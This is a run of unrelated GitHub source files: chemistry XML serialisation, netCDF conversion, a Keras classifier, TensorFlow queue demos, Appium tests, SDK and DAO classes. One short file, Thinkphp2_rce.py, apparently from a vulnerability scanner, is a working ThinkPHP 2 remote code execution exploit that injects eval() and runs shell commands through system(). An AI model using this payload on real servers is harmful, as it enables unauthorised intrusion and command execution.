# read connected atoms
atom_ids = elm.getAttribute("atms")
atoms = []
if atom_ids:
atoms = [id_manager.getObject(uid) for uid in atom_ids.split()]
if len(atoms)<2 or None in atoms:# failed to get atom from id
return False
bond.connectAtoms(atoms[0], atoms[1])
# read second line side
side = elm.getAttribute("side")
if side:
bond.second_line_side = int(side)
bond.auto_second_line_side = False
# color
color = elm.getAttribute("clr")
if color:
bond.color = hex_to_color(color)
return True
# -------------------- end of bond ----------------------
# -------------------- Marks ----------------------------
def mark_add_attributes_to_xml_node(mark, elm):
pos_attr = float_to_str(mark.rel_x) + "," + float_to_str(mark.rel_y)
elm.setAttribute("rel_pos", pos_attr)
elm.setAttribute("size", float_to_str(mark.size))
def mark_read_xml_node(mark, elm):
pos = elm.getAttribute("rel_pos")
if pos:
mark.rel_x, mark.rel_y = map(float, pos.split(","))
size = elm.getAttribute("size")
if size:
mark.size = float(size)
short_charge_types = { "normal": "n", "circled": "c", "partial": "p" }
# short charge type to full charge type map
full_charge_types = {it[1]:it[0] for it in short_charge_types.items()}
def charge_create_xml_node(charge, parent):
elm = parent.ownerDocument.createElement("charge")
mark_add_attributes_to_xml_node(charge, elm)
elm.setAttribute("typ", short_charge_types[charge.type])
elm.setAttribute("val", str(charge.value))
parent.appendChild(elm)
return elm
def charge_read_xml_node(charge, elm):
mark_read_xml_node(charge, elm)
type = elm.getAttribute("typ")
if type:
charge.type = full_charge_types[type]
val = elm.getAttribute("val")
if val:
charge.value = int(val)
return True
def electron_create_xml_node(electron, parent):
elm = parent.ownerDocument.createElement("electron")
mark_add_attributes_to_xml_node(electron, elm)
elm.setAttribute("typ", electron.type)
elm.setAttribute("rad", float_to_str(electron.radius))
parent.appendChild(elm)
return elm
def electron_read_xml_node(electron, elm):
mark_read_xml_node(electron, elm)
type = elm.getAttribute("typ")
if type:
electron.type = type
radius = elm.getAttribute("rad")
if radius:
electron.radius = float(radius)
return True
# ----------------- end marks -----------------------
# ------------------ ARROW ---------------------------
short_arrow_types = { "normal": "n", "equilibrium": "eq", "retrosynthetic": "rt",
"resonance": "rn", "electron_shift": "el", "fishhook": "fh",
}
# short arrow type to full arrow type map
full_arrow_types = {it[1]:it[0] for it in short_arrow_types.items()}
def arrow_create_xml_node(arrow, parent):
elm = parent.ownerDocument.createElement("arrow")
elm.setAttribute("typ", short_arrow_types[arrow.type])
points = ["%s,%s" % (float_to_str(pt[0]), float_to_str(pt[1])) for pt in arrow.points]
elm.setAttribute("pts", " ".join(points))
# color
if arrow.color != (0,0,0):
elm.setAttribute("clr", hex_color(arrow.color))
# anchor
if arrow.anchor:
elm.setAttribute("anchor", id_manager.getID(arrow.anchor))
# TODO : add head dimensions here. because, arrow may be scaled
parent.appendChild(elm)
return elm
def arrow_read_xml_node(arrow, elm):
type = elm.getAttribute("typ")
if type:
arrow.setType(full_arrow_types[type])
points = elm.getAttribute("pts")
if points:
try:
pt_list = points.split(" ")
pt_list = [pt.split(",") for pt in pt_list]
arrow.points = [(float(pt[0]), float(pt[1])) for pt in pt_list]
except:
return False
# color
color = elm.getAttribute("clr")
if color:
arrow.color = hex_to_color(color)
# anchor
anchor_id = elm.getAttribute("anchor")
if anchor_id:
anchor = id_manager.getObject(anchor_id)
if not anchor:
return False
arrow.anchor = anchor
return True
# --------------- end of arrow ---------------------
# ----------------- PLUS -----------------------
def plus_create_xml_node(plus, parent):
elm = parent.ownerDocument.createElement("plus")
elm.setAttribute("pos", float_to_str(plus.x) + "," + float_to_str(plus.y))
elm.setAttribute("size", float_to_str(plus.font_size))
# color
if plus.color != (0,0,0):
elm.setAttribute("clr", hex_color(plus.color))
parent.appendChild(elm)
return elm
def plus_read_xml_node(plus, elm):
pos = elm.getAttribute("pos")
if pos:
plus.x, plus.y = map(float, pos.split(",") )
font_size = elm.getAttribute("size")
if font_size:
plus.font_size = float(font_size)
# color
color = elm.getAttribute("clr")
if color:
plus.color = hex_to_color(color)
return True
# ------------------- end of plus -----------------------
# ---------------------- TEXT -----------------------
def text_create_xml_node(text, parent):
elm = parent.ownerDocument.createElement("text")
elm.setAttribute("pos", float_to_str(text.x) + "," + float_to_str(text.y))
elm.setAttribute("text", text.text)
elm.setAttribute("font", text.font_name)
elm.setAttribute("size", float_to_str(text.font_size))
# color
if text.color != (0,0,0):
elm.setAttribute("clr", hex_color(text.color))
parent.appendChild(elm)
return elm
def text_read_xml_node(text, elm):
pos = elm.getAttribute("pos")
if pos:
text.x, text.y = map(float, pos.split(",") )
text_str = elm.getAttribute("text")
if text_str:
text.text = text_str
font_name = elm.getAttribute("font")
if font_name:
text.font_name = font_name
font_size = elm.getAttribute("size")
if font_size:
text.font_size = float(font_size)
# color
color = elm.getAttribute("clr")
if color:
text.color = hex_to_color(color)
return True
# ---------------------- end of text ---------------------
# --------------------- BRACKET -------------------
short_bracket_types = { "square": "s", "curly": "c", "round": "r" }
# short bracket type to full bracket type map
full_bracket_types = {it[1]:it[0] for it in short_bracket_types.items()}
def bracket_create_xml_node(bracket, parent):
elm = parent.ownerDocument.createElement("bracket")
elm.setAttribute("typ", short_bracket_types[bracket.type])
points = ["%s,%s" % (float_to_str(pt[0]), float_to_str(pt[1])) for pt in bracket.points]
elm.setAttribute("pts", " ".join(points))
# color
if bracket.color != (0,0,0):
elm.setAttribute("clr", hex_color(bracket.color))
parent.appendChild(elm)
return elm
def bracket_read_xml_node(bracket, elm):
type = elm.getAttribute("typ")
if type:
bracket.type = full_bracket_types[type]
points = elm.getAttribute("pts")
if points:
try:
pt_list = points.split(" ")
pt_list = [pt.split(",") for pt in pt_list]
bracket.points = [(float(pt[0]), float(pt[1])) for pt in pt_list]
except:
pass
# color
color = elm.getAttribute("clr")
if color:
bracket.color = hex_to_color(color)
return True
# -------------------------- end of bracket ----------------------
| ksharindam/chemcanvas | chemcanvas/fileformat_ccdx.py | fileformat_ccdx.py | py | 17,214 | python | en | code | 1 | github-code | 13 |
25741745319 | from netCDF4 import Dataset
import numpy as np
from datetime import datetime
import os
import shutil
import csv
def get_min_index(data):
min_val = data[0]
for val in data:
if val <= min_val:
min_val = val
for i,val in enumerate(data):
if min_val == val:
break
return i
def get_all_files(folder):
files = [f for f in os.listdir(folder) if os.path.isfile(os.path.join(folder, f))]
return files
def get_csv_headers(file):
nc = Dataset(folder+"/"+file, 'r')
return ["Date",nc.variables['precipitation'].long_name+" ("+nc.variables['precipitation'].units+")",nc.variables['precipitation_cnt'].long_name+" ("+nc.variables['precipitation_cnt'].units+")",nc.variables['IRprecipitation'].long_name+" ("+nc.variables['IRprecipitation'].units+")",nc.variables['IRprecipitation_cnt'].long_name+" ("+nc.variables['IRprecipitation_cnt'].units+")",nc.variables['HQprecipitation'].long_name+" ("+nc.variables['HQprecipitation'].units+")",nc.variables['HQprecipitation_cnt'].long_name+" ("+nc.variables['HQprecipitation_cnt'].units+")"]
def parse_CDF(file,lat_loc,lon_loc):
#reading the netCRF file
nc = Dataset(folder+"/"+file, 'r')
#storing the all values of latitute and longitute in 'lat' and 'lon' variables
lat = nc.variables['lat'][:]
lon = nc.variables['lon'][:]
#get the data of the place based off those co-ordinates
sq_diff_lat = (lat - lat_loc)**2
sq_diff_lon = (lon - lon_loc)**2
lat_index = get_min_index(sq_diff_lat)
lon_index = get_min_index(sq_diff_lon)
date = nc.BeginDate
return [date,nc.variables['precipitation'][lon_index,lat_index],nc.variables['precipitation_cnt'][lon_index,lat_index],nc.variables['IRprecipitation'][lon_index,lat_index],nc.variables['IRprecipitation_cnt'][lon_index,lat_index],nc.variables['HQprecipitation'][lon_index,lat_index],nc.variables['HQprecipitation_cnt'][lon_index,lat_index]]
#path to the input folder
folder = "input_data/"
files = get_all_files(folder)
#Co-ordinates of the place you wish to extract data of
lat_loc = 23.1
lon_loc = 84.96
name_loc = "Lapung"
#creating a new folder with the location name to write the CSV file
if os.path.exists(name_loc):
shutil.rmtree(name_loc)
os.makedirs(name_loc)
with open(name_loc+'/data.csv', 'w', newline='') as f:
writer = csv.writer(f)
data = get_csv_headers(files[0])
writer.writerow(data)
for file in files:
# Writing data into CSV file
with open(name_loc+'/data.csv', 'a', newline='') as f:
writer = csv.writer(f)
data = parse_CDF(file,lat_loc,lon_loc)
writer.writerow(data)
print("Done.")
exit() | animeshkuzur/netCDF_to_CSV | convert2.py | convert2.py | py | 2,554 | python | en | code | 3 | github-code | 13 |
33527299426 | """
@Time: 2023/11/1 11:24
@Auth: Y5neKO
@File: Thinkphp2_rce.py
@IDE: PyCharm
"""
import requests
import urllib
from urllib.parse import urljoin
def run(url, cmd):
try:
payload = r'/index.php?s=a/b/c/${@print(eval($_POST[cmd]))}'
payload = urllib.parse.urljoin(url, payload)
response = requests.post(payload, data={"cmd": "echo '{{{{{';system('" + str(cmd) + "');echo '}}}}}';"})
if response.status_code == 200:
return True, response.text
else:
return False, "利用失败"
except:
return False
| Y5neKO/ClosureVulnScanner | exp/Thinkphp2_rce.py | Thinkphp2_rce.py | py | 584 | python | en | code | 8 | github-code | 13 |
17054086434 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class KbdishCommRuleShowInfo(object):
def __init__(self):
self._tag_ext_info = None
self._tag_name = None
self._tag_value = None
@property
def tag_ext_info(self):
return self._tag_ext_info
@tag_ext_info.setter
def tag_ext_info(self, value):
self._tag_ext_info = value
@property
def tag_name(self):
return self._tag_name
@tag_name.setter
def tag_name(self, value):
self._tag_name = value
@property
def tag_value(self):
return self._tag_value
@tag_value.setter
def tag_value(self, value):
self._tag_value = value
def to_alipay_dict(self):
params = dict()
if self.tag_ext_info:
if hasattr(self.tag_ext_info, 'to_alipay_dict'):
params['tag_ext_info'] = self.tag_ext_info.to_alipay_dict()
else:
params['tag_ext_info'] = self.tag_ext_info
if self.tag_name:
if hasattr(self.tag_name, 'to_alipay_dict'):
params['tag_name'] = self.tag_name.to_alipay_dict()
else:
params['tag_name'] = self.tag_name
if self.tag_value:
if hasattr(self.tag_value, 'to_alipay_dict'):
params['tag_value'] = self.tag_value.to_alipay_dict()
else:
params['tag_value'] = self.tag_value
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = KbdishCommRuleShowInfo()
if 'tag_ext_info' in d:
o.tag_ext_info = d['tag_ext_info']
if 'tag_name' in d:
o.tag_name = d['tag_name']
if 'tag_value' in d:
o.tag_value = d['tag_value']
return o
| alipay/alipay-sdk-python-all | alipay/aop/api/domain/KbdishCommRuleShowInfo.py | KbdishCommRuleShowInfo.py | py | 1,884 | python | en | code | 241 | github-code | 13 |
29817695078 | import pickle
import numpy as np
import tensorflow as tf
from sklearn.svm import SVC
from random import shuffle
from sklearn.preprocessing import normalize
from sklearn.neighbors import KNeighborsClassifier
import utils
import image
import pickle
import os
from keras.models import Sequential
from keras.layers import Dense
from sklearn.model_selection import train_test_split
from sklearn.model_selection import KFold
from sklearn.preprocessing import LabelEncoder
from keras.utils import np_utils
import matplotlib.pyplot as plt
class classifier:
def __init__(self, data, norm=True):
self.data = data
shuffle(self.data)
self.inputs = self._extract_input(norm)
self.labels = self._extract_labels()
self.valid_labels = self._get_valid_labels()
self.encoder = LabelEncoder()
def _extract_input(self, norm):
"""
Extract the inputs and normalize
them if normalize is set to true
"""
inputs = [x[0] for x in self.data]
if norm:
inputs = normalize(inputs)
return inputs
def _extract_labels(self):
"""
Extract the labels from the data
"""
labels = [x[1] for x in self.data]
return labels
def _get_valid_labels(self):
"""
Extract the set of valid class labels
from the data
"""
label_list = [x[1] for x in self.data]
return set(label_list)
def _ohe_labels(self):
"""
One hot encode the labels
"""
self.encoder.fit(self.labels)
self.labels = self.encoder.transform(self.labels)
self.labels = np_utils.to_categorical(self.labels)
def train_mlp(self, cv=False):
"""
Train the mlp on the training data
"""
self._ohe_labels()
input_size = len(self.inputs[0])
output_size = len(self.valid_labels)
hidden_size_1 = 15
hidden_size_2 = 15
# Create the MLP
model = Sequential()
model.add(Dense(hidden_size_1, activation='relu', input_dim=input_size))
model.add(Dense(hidden_size_2, activation='relu'))
model.add(Dense(output_size, activation='softmax'))
# Compile model with optimizer and loss function
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
# Configure data
features = self.inputs
labels = self.labels
kfold = KFold(n_splits=10, shuffle=True, random_state=5)
scores = []
if cv:
for train, test in kfold.split(features, labels):
# Create the MLP
model = Sequential()
model.add(Dense(hidden_size_1, activation='relu', input_dim=input_size))
model.add(Dense(hidden_size_2, activation='relu'))
model.add(Dense(output_size, activation='softmax'))
# Compile model with optimizer and loss function
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
model.fit(features[train], labels[train], epochs=25, batch_size=5, verbose=2)
# evaluate the model
score = model.evaluate(features[test], labels[test], verbose=2)
print("{0}: {1}".format(model.metrics_names[1], score[1]))
scores.append(score[1])
return scores
else:
model.fit(features, labels, epochs=30, batch_size=5, verbose=2)
return model
def classify_new_image(self):
"""
Train the network, then classify each
square of a divided image
"""
n=5
file_path = 'Data/YukonGold_Tomato_Banana_1_Day3.bil'
print ("Loading image...")
raw_image = image.HyperCube(file_path)
#raw_image.dark_correction()
original_shape = raw_image.image.shape
orig_x = original_shape[0]
orig_y = original_shape[1]
print ("Dividing image...")
divided_image_reflectances = utils.avg_spectra_divided_image(raw_image, n)
input_size = len(self.inputs[0])
output_size = len(self.valid_labels)
hidden_size_1 = 15
hidden_size_2 = 15
print ("Training model...")
model = self.train_mlp()
print ("Classifying image...")
classified_image = model.predict(divided_image_reflectances)
number_labels = []
for im in classified_image:
number_labels.append(np.argmax(im))
number_labels = np.array(number_labels).astype(int)
labeled_image = self.encoder.inverse_transform(number_labels)
labeled_image = np.reshape(labeled_image, (orig_x/n, orig_y/n, 1))
raw_image.fix_image()
divided_image_reflectances = utils.avg_spectra_divided_image(raw_image, n)
divided_image_reflectances = np.reshape(divided_image_reflectances, (orig_x/n, orig_y/n, 290))
plt.plot(divided_image_reflectances[0][0])
plt.show()
return (labeled_image, divided_image_reflectances)
if __name__ == '__main__':
try:
data = pickle.load( open( "avg_class_refl.p", "rb" ))
except (OSError, IOError) as e:
"No file found..."
classify = classifier(data, norm=True)
#errors = classify.train_mlp(cv=False)
#for error in errors:
# print (error)
image_classes = classify.classify_new_image()
pickle.dump(image_classes[0], open("image_labels.p", "wb" ) )
pickle.dump(image_classes[1], open("image_refl.p","wb")) | senecal-jjs/Hyperspectral | keras_classification.py | keras_classification.py | py | 5,618 | python | en | code | 0 | github-code | 13 |
73817139217 | teencode = {
'vk': 'vo',
'ck': 'chong',
'hoy': 'thoi',
'lem': 'lam',
'hsi': 'hay sao i',
'yep': 'yes',
'choai xu': 'twice'
}
loop = True
while loop:
key = input('Bạn muốn tra từ gì? ').strip()
if key in teencode:
print(f"{key} nghĩa là {teencode[key]}")
else:
answer = input('Chưa có trong từ điển. Bạn có muốn thêm mới vào? (yes/no): ').lower().strip()
if answer == 'yes':
meaning = input('Mời bạn nhập nghĩa của từ đó: ')
teencode[key] = meaning
else:
pass | thuhuongvan98/Huong-Van | Lesson 5/ex_dict.py | ex_dict.py | py | 625 | python | vi | code | 0 | github-code | 13 |
39653392352 | import tensorflow as tf
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
def imitate_synchronize():
'''
模拟一下同步先处理数据,然后才能取数据训练
:return:
'''
# 1 创建一个队列
queue = tf.FIFOQueue(1000, tf.float32)
# 放入数据
enq_m = queue.enqueue_many([[0.1, 0.3, 0.4],]) # 注意数据形式, [0.1, 0.3, 0.4]会被看做是一个张量, 而非多个数据
# 2 进行读取数据, 处理数据的操作 读取数据之后--> +1 --> 放入数据
enq_one = queue.dequeue() # 读取数据
enq_add = enq_one + 1 # 对数据进行操作
deq_one = queue.enqueue(enq_add) # 放回数据
with tf.Session() as sess:
# 初始化队列, 放入初始数据
sess.run(enq_m)
# 对数据进行操作
for i in range(100):
sess.run(deq_one) # 连锁反应, 步步关联的计算, 只需要书写相关部分的最后一步
for j in range(queue.size().eval()): # 注意此处的queue.size() 为一个op 故, 需要eval() 将其变为数据
print(sess.run(queue.dequeue()))
return None
def imitate_asynchronize():
'''
模拟异步读取数据的过程
模拟异步子线程 存入样本, 主线程 读取样本
:return: None
'''
# 1 构建队列, 定义一个1000数据的队列
queue = tf.FIFOQueue(1000, tf.float32)
# 2 定义操作 +1 放入数据
var = tf.Variable(0.0)
data = tf.assign_add(var, tf.constant(1.0))
deq_one = queue.enqueue(data)
# 子线程, 队列管理器 ---定义队列管理器op, 指定多少个子线程,子线程该干什么事情
qr = tf.train.QueueRunner(queue, enqueue_ops=[deq_one] * 2)
# 初始化变量
init_op = tf.global_variables_initializer()
with tf.Session() as sess:
# 初始化队列
sess.run(init_op)
# 开启线程协调器----用于回收线程
coord = tf.train.Coordinator()
# 定义子线程的操作, 开启子线程
threads = qr.create_threads(sess,coord=coord, start=True)
# 主线程读取数据, 训练
for i in range(300):
print(sess.run(queue.dequeue()))
# 子线程的回收
coord.request_stop()
coord.join(threads)
pass
return None
if __name__ == '__main__':
# imitate_synchronize()
imitate_asynchronize() | bwbobbr/AI | 机器学习/day_05/day_05.py | day_05.py | py | 2,448 | python | zh | code | 0 | github-code | 13 |
41643411405 | # Method: 2 pass method
# 1: Calculate Length
# 2: Split list into k lists
# TC: O(n)
# SC: O(n)
from typing import Optional
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def splitListToParts(self, head: Optional[ListNode], k: int) -> List[Optional[ListNode]]:
result = []
# 1: Calculate the length of the linked list
count = 0
ptr = head
while ptr:
count += 1
ptr = ptr.next
part_len, rem_len = count // k, count % k
# 2: Split the list in k parts
ptr = head
for i in range(k):
curr_list = ptr
if rem_len > 0:
curr_len = part_len + 1
rem_len -= 1
else:
curr_len = part_len
if curr_len > 0:
for j in range(curr_len):
temp = ptr
if ptr:
ptr = ptr.next
else:
ptr = None
if temp:
temp.next = None
result.append(curr_list)
return result
| ibatulanandjp/Leetcode | #725_SplitLinkedListInParts/solution.py | solution.py | py | 1,243 | python | en | code | 1 | github-code | 13 |
32642770740 |
import numpy as np
import tensorflow as tf
from agent import agent
from rtb_environment import RTB_environment, get_data
from drlb_test import drlb_test
from lin_bid_test import lin_bidding_test
from rand_bid_test import rand_bidding_test
#parameter_list = [camp_id, epsilon_decay_rate, budget_scaling, budget_init_variance, initial_Lambda]
def parameter_camp_test(parameter_list):
"""
This function should take a camp ID, train an agent for that specific campaign
and then test the agent for that campaign. We start by defining the hyper-parameters.
It (currently) takes the whole campaign as an episode.
"""
epsilon_max = 0.9
epsilon_min = 0.05
discount_factor = 1
batch_size = 32
memory_cap = 100000
update_frequency = 100
episode_length = 96
camp_id = parameter_list[0]
budget_scaling = parameter_list[1]
initial_Lambda = parameter_list[2]
epsilon_decay_rate = parameter_list[3]
budget_init_var = parameter_list[4] * budget_scaling
step_length = parameter_list[5]
learning_rate = parameter_list[6]
seed = parameter_list[7]
action_size = 7
state_size = 5
tf.reset_default_graph()
np.random.seed(seed)
tf.set_random_seed(seed)
sess = tf.Session()
rtb_agent = agent(epsilon_max, epsilon_min, epsilon_decay_rate,
discount_factor, batch_size, memory_cap,
state_size, action_size, learning_rate, sess)
camp_n = ['1458', '2259', '2997', '2821', '3358', '2261', '3386', '3427', '3476']
train_file_dict, test_file_dict = get_data(camp_n)
test_file_dict = test_file_dict[camp_id]
total_budget = 0
total_impressions = 0
global_step_counter = 0
for i in camp_n:
rtb_environment = RTB_environment(train_file_dict[i], episode_length, step_length)
total_budget += train_file_dict[i]['budget']
total_impressions += train_file_dict[i]['imp']
while rtb_environment.data_count > 0:
episode_size = min(episode_length * step_length, rtb_environment.data_count)
budget = train_file_dict[i]['budget'] * min(rtb_environment.data_count, episode_size) \
/ train_file_dict[i]['imp'] * budget_scaling
budget = np.random.normal(budget, budget_init_var)
state, reward, termination = rtb_environment.reset(budget, initial_Lambda)
while not termination:
action, _, _ = rtb_agent.action(state)
next_state, reward, termination = rtb_environment.step(action)
memory_sample = (action, state, reward, next_state, termination)
rtb_agent.replay_memory.store_sample(memory_sample)
rtb_agent.q_learning()
if global_step_counter % update_frequency == 0:
rtb_agent.target_network_update()
rtb_agent.e_greedy_policy.epsilon_update(global_step_counter)
state = next_state
global_step_counter += 1
epsilon = rtb_agent.e_greedy_policy.epsilon
budget = total_budget / total_impressions * test_file_dict['imp'] * budget_scaling
imp, click, cost, wr, ecpc, ecpi, camp_info = drlb_test(test_file_dict, budget, initial_Lambda, rtb_agent,
episode_length, step_length)
sess.close()
lin_bid_result = list(lin_bidding_test(train_file_dict[camp_id], test_file_dict, budget, 'historical'))
rand_bid_result = list(rand_bidding_test(train_file_dict[camp_id], test_file_dict, budget, 'uniform'))
result_dict = {'camp_id':camp_id, 'parameters': parameter_list[1:], 'epsilon':epsilon, 'total budget':budget,
'auctions': test_file_dict['imp'],
'camp_result': np.array([imp, click, cost, wr, ecpc, ecpi]).tolist(), 'budget':camp_info[0],
'lambda':camp_info[1], 'unimod':camp_info[2], 'action values':camp_info[3],
'lin_bid_result':lin_bid_result, 'rand_bid_result':rand_bid_result}
return result_dict | zgcgreat/dqn-rtb | parameter_test.py | parameter_test.py | py | 4,072 | python | en | code | 0 | github-code | 13 |
36388907882 | """
Implement the Reverification XBlock "reverification" server
"""
import logging
from opaque_keys.edx.keys import CourseKey
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse
from verify_student.models import VerificationCheckpoint, VerificationStatus, SkippedReverification
from django.db import IntegrityError
log = logging.getLogger(__name__)
class ReverificationService(object):
""" Service to implement the Reverification XBlock "reverification" service
"""
def get_status(self, user_id, course_id, related_assessment):
""" Check if the user has any verification attempt or has skipped the verification
Args:
user_id(str): User Id string
course_id(str): A string of course_id
related_assessment(str): Verification checkpoint name
Returns:
"skipped" if has skip the re-verification or Verification Status string if
any attempt submitted by user else None
"""
course_key = CourseKey.from_string(course_id)
has_skipped = SkippedReverification.check_user_skipped_reverification_exists(user_id, course_key)
if has_skipped:
return "skipped"
try:
checkpoint_status = VerificationStatus.objects.filter(
user_id=user_id,
checkpoint__course_id=course_key,
checkpoint__checkpoint_name=related_assessment
).latest()
return checkpoint_status.status
except ObjectDoesNotExist:
return None
def start_verification(self, course_id, related_assessment, item_id):
""" Get or create the verification checkpoint and return the re-verification link
Args:
course_id(str): A string of course_id
related_assessment(str): Verification checkpoint name
Returns:
Re-verification link
"""
course_key = CourseKey.from_string(course_id)
VerificationCheckpoint.objects.get_or_create(course_id=course_key, checkpoint_name=related_assessment)
re_verification_link = reverse(
'verify_student_incourse_reverify',
args=(
unicode(course_key),
unicode(related_assessment),
unicode(item_id)
)
)
return re_verification_link
def skip_verification(self, checkpoint_name, user_id, course_id):
"""Create the add verification attempt
Args:
course_id(str): A string of course_id
user_id(str): User Id string
checkpoint_name(str): Verification checkpoint name
Returns:
None
"""
course_key = CourseKey.from_string(course_id)
checkpoint = VerificationCheckpoint.objects.get(course_id=course_key, checkpoint_name=checkpoint_name)
# if user do not already skipped the attempt for this course only then he can skip
try:
SkippedReverification.add_skipped_reverification_attempt(checkpoint, user_id, course_key)
except IntegrityError:
log.exception("Skipped attempt already exists for user %s: with course %s:", user_id, unicode(course_id))
| escolaglobal/edx-platform | lms/djangoapps/verify_student/services.py | services.py | py | 3,251 | python | en | code | 0 | github-code | 13 |
16510515254 | """
from : https://leetcode.com/problems/candy-crush/discuss/1028524/Python-Straightforward-and-Clean-with-Explanation
Don't be intimidated by how long or ugly the code looks. Sometimes I fall into that trap. It's simpler than it seems.
Also, I would love feedback if this is helpful, or if there are any mistakes!
A key insight to the problem is to know that in order to make crushing the candies an easier process, you should store the locations of the board where a candy can be crushed in a separate data structure.
We will use a set called "crushable" and store coordinates of the board where a candy may be crushed
5 Main Steps.
Mark where the candies can be crushed horizontally
Loop through the board and check 3 spots at a time to see if there is the same character and that character isn't 0
Mark where the candies can be crushed vertically
Same thing, but vertically
Crush the candies
Go through the set of crushable locations, and edit the original board
Shift candies down if there are zeroes below them.
Pay attention to the columns. We will start from the bottom of the board, and work our way up, shifting the candies that were not crushed into their "fallen" position.
Find out where to determine whether or not a board's candies can be crushed anymore
If we loop through the entire board, and no candy was crushed, then we are finished.
Time: O(m * n) where m = rows and n = cols. Or you could say O(n) where n = every element in the board
- We must loop through the entire board no matter what
Space: O(n) where n is the total number of elements in the board
- In the worst case scenario, we store the locations of every spot on the board in the crushable set
"""
class Solution:
def candyCrush(self, board: List[List[int]]) -> List[List[int]]:
m, n = len(board), len(board[0])
stable = False
while True:
stable = True
crushable = set()
# 1. check for horizontal crushables
for x in range(m):
for y in range(n-2):
if board[x][y] == board[x][y+1] == board[x][y+2] != 0:
stable = False
crushable.update([(x, y), (x, y+1), (x, y+2)])
# 2. check for vertical crushables
for x in range(m-2):
for y in range(n):
if board[x][y] == board[x+1][y] == board[x+2][y] != 0:
stable = False
crushable.update([(x, y), (x+1, y), (x+2, y)])
# 5. if no candies were crushed, we're done
if stable:
return board
# 3. crush the candies
for x, y in crushable:
board[x][y] = 0
# 4. let the candies "fall"
for y in range(n):
offset = 0
for x in range(m-1, -1, -1): # loop through column backward
k = x + offset
if (x, y) in crushable: # this will help us put items at bottom of the board
offset += 1
else:
board[k][y] = board[x][y] # notice the use of k
# now that all items have been copied to their right spots, place zero's appropriately at the top of the board
for x in range(offset):
board[x][y] = 0
| tmbothe/Data-Structures-and-algorithms | src/arrays/candyCrush.py | candyCrush.py | py | 3,377 | python | en | code | 0 | github-code | 13 |
41905906790 | import csv
import os
import time
import re
import commands
import string
from appium import webdriver
import logging
import datetime
logging.basicConfig(level=logging.INFO)
apk_path = os.path.join(os.getcwd(), 'lite.apk')
class Browser(object):
platform_name = 'Android'
platform_version = string.strip(commands.getoutput('adb shell getprop ro.build.version.release'))
devices_name = string.strip(commands.getoutput('adb shell getprop ro.serialno'))
phone_name = string.strip(commands.getoutput('adb shell getprop ro.build.id'))
def __init__(self):
self.desired_caps = {}
self.desired_caps['platformName'] = 'Android'
self.desired_caps['platformVersion'] = '6.0'
self.desired_caps['deviceName'] = '80QBCP9224W2'
self.desired_caps['app'] = apk_path
self.desired_caps['appPackage'] = 'com.qihoo.contents'
self.desired_caps['appActivity'] = 'com.qihoo.contents.launcher.LauncherActivity'
self.desired_caps['noReset'] = True
self.desired_caps['unicodeKeyboard'] = False
self.desired_caps['resetKeyboard'] = False
self.driver = webdriver.Remote('http://localhost:4723/wd/hub', self.desired_caps)
self.driver.implicitly_wait(600)
def install_app(self):
cmd = 'adb install ' + apk_path
os.popen(cmd)
logging.info('install app done')
def uninstall_app(self):
cmd = 'adb uninstall com.qihoo.contents'
os.popen(cmd)
logging.info('uninstall app done')
def is_app_installed(self):
cmd = 'adb shell pm list packages'
output = os.popen(cmd)
app_status = False
for line in output.readlines():
if 'com.qihoo.contents' in line:
app_status = True
return app_status
def test_launch_time(self):
start_time = self.get_cur_time()
# logging.info('StartTime is ' + string(start_time))
ele = self.driver.find_element_by_id('com.qihoo.contents:id/home_top_user')
if ele.is_displayed():
end_time = self.get_cur_time()
# logging.info("Endtime is " + string(end_time))
launch_time = end_time - start_time
return launch_time
def get_cur_time(self):
return datetime.datetime.strptime(str(datetime.datetime.now()), '%Y-%m-%d %H:%M:%S.%f')
class Controller(object):
def __init__(self, count):
self.browser = Browser()
self.count = count
self.data = [{'#', 'launch_time'}]
def run(self):
while self.count > 0:
self.browser.test_launch_time()
time.time(3)
self.count = self.count - 1
def save_data(self):
csv_file = file(self.browser.phone_name + '_launchTime_' + cur_time() + '.csv', 'wb')
w = csv.writer(csv_file)
w.writerows(self.data)
csv_file.close()
def tearDown(self):
os.popen('adb uninstall com.qihoo.contents')
self.browser.driver.quit()
if __name__ == "__main__":
logging.info(apk_path)
controller = Controller(10)
controller.run()
controller.save_data()
| sxwollo/BrowserAppTest | venv/AppTest/launch_time_ui.py | launch_time_ui.py | py | 3,127 | python | en | code | 0 | github-code | 13 |
36460849139 | poker=list(range(1,53))
import random as rd
#rd.seed(30)
n=0
count=1000
while n<=count:
rdnum1,rdnum2=int(rd.random()*51),int(rd.random()*51)
while rdnum2==rdnum1:
rdnum2=int(rd.random()*51)
poker[rdnum1],poker[rdnum2]=poker[rdnum2],poker[rdnum1]
n+=1
first,second=poker[0],poker[1]
def drop_card(card):
kind,num=card//13,card%13
if kind==0: print("黑桃",end=" ")
if kind==1: print("愛心",end=" ")
if kind==2: print("菱形",end=" ")
if kind==3: print("梅花",end=" ")
print(num+1)
drop_card(first),drop_card(second)
a=[1,2,3,4,5,6,7,8]
b=[1,2,3,4,5,6,7,8]
length=0
for i in a:
for j in b:
if i==j:
length+=1
break
print(length)
| fightpf/advanceiborgainc | 20200529temp.py | 20200529temp.py | py | 763 | python | en | code | 0 | github-code | 13 |
10065084450 | try:
from models.db import DbDAO
except ModuleNotFoundError:
from website.models.db import DbDAO
import logging
__author__ = "Le Gall Guillaume"
__copyright__ = "Copyright (C) 2020 Le Gall Guillaume"
__website__ = "www.gyca.fr"
__license__ = "BSD-2"
__version__ = "1.0"
class Invoice:
def __init__(self):
self.name = ''
self.id_client = 0
self.project = ''
self.date_sent = ''
self.date_expiry = ''
self.max_delay = ''
self.total = ''
self.tax = False
self.days = 0
self.day_rate = 0
self.sold = False
self.created = ''
self.id_profile = -1
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return "<Invoice name: '{}'>".format(self.name)
class InvoiceDAO(DbDAO):
def __init__(self, dbpath=None):
super().__init__('invoice',db_path=dbpath)
self.obj_type = Invoice
self.table_create = {
'id': 'INTEGER PRIMARY KEY AUTOINCREMENT',
'name': 'text NOT NULL',
'id_client': 'INTEGER NOT NULL',
'project': 'TEXT',
